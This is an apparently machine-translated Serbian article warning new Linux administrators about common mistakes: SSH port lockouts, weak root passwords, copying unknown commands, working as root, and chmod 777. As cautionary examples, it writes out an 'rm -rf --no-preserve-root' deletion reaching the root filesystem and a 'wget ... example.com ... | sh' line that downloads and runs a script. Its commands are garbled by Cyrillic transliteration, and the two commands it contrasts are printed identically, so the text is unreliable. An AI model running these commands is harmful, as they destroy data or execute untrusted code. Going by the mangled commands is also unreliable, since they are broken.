Phenquestions
Линук командна линија даје администраторима сервера контролу над њиховим серверима и подацима ускладиштеним на њима, али их мало спречава да извршавају деструктивне команде са последицама које се не могу поништити. Случајно брисање података само је једна врста грешке коју чине нови администратори сервера.
Закључавање кључева унутра
Администратори сервера се повезују на сервере помоћу ССХ-а, услуге која се обично изводи на порту 22, пружајући љуску за пријављивање преко које овјерени корисници могу изводити наредбе на удаљеним серверима. Стандардни корак јачања сигурности је конфигурисање ССХ-а да прихвата везе на другом порту. Премештање ССХ-а на насумични порт високог броја ограничава утицај грубе силе; хакери не могу покушати злонамерне пријаве када не могу да пронађу порт на којем ССХ слуша.
Међутим, администратор који конфигурише ССХ за преслушавање на другом порту, а затим поново покреће ССХ сервер, можда ће открити да нису само хакери ти који су закључани. Ако заштитни зид сервера такође није конфигурисан да дозволи везе на новом порту, покушаји повезивања никада неће доћи до ССХ сервера. Администратор ће бити закључан са свог сервера без икаквог начина да реши проблем, осим што ће отворити карту за подршку код свог добављача услуга хостинга. Ако промените ССХ порт, обавезно отворите нови порт у конфигурацији заштитног зида вашег сервера.
Избор лако погодљиве лозинке
Напади грубе силе су игра погађања. Нападач покушава многа корисничка имена и лозинке док не погоди комбинацију која их пушта. Речнички напад је рафиниранији приступ који користи листе лозинки, често искоришћене из процурелих база података лозинки. Напади на роот налог су лакши него на друге налоге јер нападач већ зна корисничко име. Ако роот налог има једноставну лозинку, онда га можете у кратком року хаковати.
Постоје три начина за одбрану од напада грубе силе и речника против основног налога.
- Изаберите дугу и сложену лозинку. Једноставне лозинке је лако разбити; дуге и сложене лозинке су немогуће.
- Конфигуришите ССХ да не дозволи роот пријаве. Ово је једноставна промена конфигурације, али уверите се да је „судо“ конфигурисан да вашем налогу дозволи да повећа своје привилегије.
- Уместо лозинки користите аутентификацију засновану на кључу. Пријаве засноване на сертификатима у потпуности уклањају ризик од грубе силе.
Копирање команди које не разумете
Стацк Екцханге, Сервер Фаулт и сличне локације су спас за нове администраторе Линук система, али требало би да избегнете искушење да копирате и налепите команду љуске коју не разумете. Која је разлика између ове две команде?
судо рм -рф --но -серве-роот / мнт / мидриве /судо рм -рф --но -серве-роот / мнт / мидриве /
Лако је видети када се приказују заједно, али није тако лако када претражујете форуме тражећи команду за брисање садржаја монтиране свеске. Прва наредба брише све датотеке на монтираном диску. Друга наредба брише те датотеке и све у коренском систему датотека сервера. Једина разлика је простор пре коначне косе црте.
Администратори сервера могу наићи на дугачке команде са цевоводима за које се каже да раде једно, а раде нешто друго у потпуности. Будите посебно опрезни са наредбама које преузимају код са Интернета.
вгет хттп: // пример.цом / верибадсцрипт -О - | сх -Ова наредба користи вгет за преузимање скрипте која се цијеви до љуске и извршава. Да бисте ово безбедно покренули, морате разумети шта команда ради, а такође и оно што ради преузета скрипта, укључујући било који код који преузета скрипта може сама преузети.
Пријављивање као роот
Иако обични корисници могу мењати датотеке само у својој матичној фасцикли, мало је оно што роот корисник не може учинити на Линук серверу. Може покретати било који софтвер, читати било које податке и брисати било коју датотеку.
Апликације које покреће роот корисник имају сличну снагу. Погодно је бити пријављен као роот корисник јер не морате стално да „судо“ или „су“, али је опасно. Штампарска грешка може за неколико секунди уништити ваш сервер. Бугги софтвер који покреће роот корисник може створити катастрофу. За свакодневне операције пријавите се као обичан корисник и подигните роот привилегије само када је то потребно.
Не учим дозволе за систем датотека
Дозволе датотечног система могу збунити и фрустрирати нове кориснике Линука. Низ дозвола попут „дрвкр-кр-к“ у почетку изгледа бесмислен, а дозволе вас могу спречити да мењате датотеке и зауставити софтвер да ради оно што желите.
Системски администратори брзо сазнају да је цхмод 777 магична зачараност која решава већину ових проблема, али то је ужасна идеја. Омогућава свима који имају налог да читају, пишу и извршавају датотеку. Ако покренете ту команду у директоријуму веб сервера, тражићете хаковање. Дозволе за Линук датотеке изгледају сложено, али ако одвојите неколико минута да научите како раде, открићете логичан и флексибилан систем за контролу приступа датотекама.
У ери која једноставна корисничка искуства вреднује преко свих осталих фактора, Линук командна линија остаје одлучно сложена и отпорна на поједностављење. Не можете да се забрљате и надате се да ће све бити у реду. Неће бити у реду и на крају ћете завршити с катастрофом.
Али ако научите основе - дозволе за датотеке, алате за командну линију и њихове опције, најбоље праксе у безбедности - можете постати мајстор једне од најмоћнијих рачунарских платформи икада створених.
